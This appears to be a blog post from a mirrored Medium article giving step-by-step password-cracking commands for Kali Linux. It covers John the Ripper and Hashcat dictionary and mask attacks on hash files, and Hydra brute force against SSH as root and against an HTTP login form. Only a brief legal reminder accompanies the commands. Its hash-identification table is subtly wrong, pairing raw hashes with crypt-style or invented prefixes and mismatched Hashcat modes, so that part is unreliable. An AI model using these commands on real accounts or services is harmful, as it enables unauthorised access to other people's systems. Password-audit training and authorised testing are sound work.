How to Crack Passwords Using Kali Linux (John & Hashcat )

How to Crack Passwords Using Kali Linux (John & Hashcat ) | by Fx03 - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original How to Crack Passwords Using Kali Linux (John & Hashcat ) Learn password cracking using this tools really its make you an a good hacker Fx03 Follow ~2 min read · April 6, 2026 (Updated: April 6, 2026) · Free: Yes Welcome back. Today i will explain how we can crack password hashes using Kali Linux tools. No theory. No stories. Just commands. If you are interested in my writing or post follow and like this post 😸 Before You Start You need: · Kali Linux (installed or live boot) · A wordlist (rockyou.txt) · A hash file to crack Step 1: Install Required Tools Kali usually comes with these pre-installed. If missing, run: sudo apt update sudo apt install john hashcat hydra -y Get the RockYou Wordlist sudo gunzip /usr/share/wordlists/rockyou.txt.gz Verify it exists: ls -la /usr/share/wordlists/rockyou.txt Step 2: Identify Your Hash Type Before cracking, know what you're dealing with. Hash Type Example Length Identifier MD5 32 chars $md5$ or no prefix SHA-256 64 chars $5$ SHA-512 128 chars $6$ NTLM 32 chars (uppercase) $NT$ Quick identify: hashcat --identify hash.txt Step 3: Crack with John the Ripper Basic dictionary attack john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Show cracked passwords john --show hash.txt Force a specific hash format (example: MD5) john --format=raw-md5 --wordlist=rockyou.txt hash.txt Step 4: Crack with Hashcat (GPU accelerated) Syntax hashcat -m [hash_type_code] -a 0 hash.txt wordlist.txt Common hash type codes Hash Type Code MD5 0 SHA-256 1400 SHA-512 1700 NTLM 1000 Example (cracking MD5) hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt Show cracked results hashcat -m 0 hash.txt --show Mask attack (brute force pattern) Example: 8 chars, starts uppercase, ends with 2 digits hashcat -m 0 -a 3 hash.txt ?u?l?l?l?l?l?d?d Mask char Meaning ?u Uppercase A-Z ?l Lowercase a-z ?d Digit 0-9 ?s Special chars Step 5: Online Attack with Hydra Use when you have a login page or service, not a hash file. SSH brute force hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10 HTTP login form hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Incorrect" Flag meanings: · -l = single username · -L = username list file · -P = password list file · F=Incorrect = failure string to detect wrong login Quick Reference – Most Used Commands Task Command Unzip rockyou sudo gunzip /usr/share/wordlists/rockyou.txt.gz John basic john --wordlist=rockyou.txt hash.txt John show results john --show hash.txt Hashcat MD5 hashcat -m 0 -a 0 hash.txt rockyou.txt Hashcat NTLM hashcat -m 1000 -a 0 hash.txt rockyou.txt Hydra SSH hydra -l root -P rockyou.txt ssh://target_ip Helpful Tips · Cracking too slow? Use Hashcat with a GPU (10-100x faster than CPU) · No luck? Generate custom wordlist with cewl: cewl https://target.com -w custom.txt · Save time: Start with rockyou.txt, then move to mask attacks Legal Reminder Only crack hashes you own or have written permission to test. Questions? Drop a comment below. Clap and follow for more Kali Linux tool guides. •BE ETHICAL BE GOOD • #cybersecurity #bug-bounty #technology #hacking #linux Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).